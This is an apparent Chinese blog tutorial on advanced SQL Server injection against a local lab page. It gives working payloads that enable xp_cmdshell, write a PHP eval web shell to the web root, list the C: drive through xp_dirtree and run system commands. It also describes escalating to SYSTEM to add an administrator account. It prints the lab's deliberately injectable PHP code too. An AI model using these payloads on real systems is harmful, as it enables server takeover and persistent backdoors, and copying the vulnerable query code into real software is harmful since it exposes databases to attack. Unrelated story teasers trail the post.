SQL Server 高级注入

sql  server 数据库可以通过xp_cmdshell组件执行一些系统命令

阻止

可以看到sql  server 数据库在默认这状态下阻止了xp_cmdshell的应用

通过以下命令进行开启:

id=1'; EXEC  sp_configure  'show advanced options', 1; RECONFIGURE  WITH  OVERRIDE;  EXEC sp_configure  'xp_cmdshell', 1; RECONFIGURE  WITH  OVERRIDE ;  -- '

开启xp_cmdshell

虽然没有在页面回显,实际上已经开启xp_cmdshell

附加上:

关闭xp_cmdshell

关闭xp_cmdshell

写入一句话木马

没有报错

id=1' exec master..xp_cmdshell "echo ^<?php eval($_POST['cmd'])?^> > C:\\xampp\\htdocs\\cmd.php" -- '

查看文件

一句话木马已经写入

进行验证

成功执行命令

遍历C盘

为了确保准确语句是否执行成功,复制connect.php源代码到shell.php

因为需要在URL上执行两条或多条系统命令,需要修改源代码

源代码为

<?php

header("Content-type:text/html; charset=gbk");

$serverName = "127.0.0.1";

$uid="sa";

$pwd="123456";

$connectionInfo = array("UID"=>$uid, "PWD"=>$pwd, "Database"=>"demo");

$conn = sqlsrv_connect($serverName, $connectionInfo);

if($conn == false){

echo "连接失败!";

var_dump(sqlsrv_errors());

exit;

}else{

//echo "链接成功";

$id=$_GET['id'];

$sqls = "select * from users where  id='".$id."'";

echo $sqls."<hr/>";

$sql=explode(';', $sqls);

//var_dump(sqlsrv_errors());

if(empty(sqlsrv_errors())){

$query = sqlsrv_query($conn,$sql[0]);

while($num=sqlsrv_fetch_array($query)){

echo $num['name'];

}

$query = @sqlsrv_query($conn,$sql[1]);

while($num=@sqlsrv_fetch_array($query)){

print_r($num);

}

}else{

$error=sqlsrv_errors();

echo $error[0][2];

}

sqlsrv_close($conn);

}

?>

保存进行访问,创建数据库

id=1'; create table dirs(paths varchar(200),id int) -- '

dirs数据表

查看数据库,进行调整

插入数据

id=1'; insert dirs exec master.dbo.xp_dirtree 'c:\' -- '

将C盘遍历插入到数据表中,查看

成功插入

进行读取数据

1'; select top 100 paths from dirs -- '

读出C盘文件

自然可以执行dos命令,语句为:

id=1'; exec master..xp_cmdshell 'ipconfig' -- 

读取IP地址

添加管理员

查看当前权限

network权限

不懂该权限时什么意思,查找后为

此权限

在该network权限下是无法添加管理员的,要想添加管理员

需要把当前用户的权限修改为localSystem权限进行运行

重启后再次执行

系统权限

成功修改为system权限

再次添加管理员

成功完成

附图:

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 215,723评论 6 498
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,003评论 3 391
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 161,512评论 0 351
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,825评论 1 290
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,874评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,841评论 1 295
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,812评论 3 416
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,582评论 0 271
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,033评论 1 308
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,309评论 2 331
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,450评论 1 345
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,158评论 5 341
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,789评论 3 325
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,409评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,609评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,440评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,357评论 2 352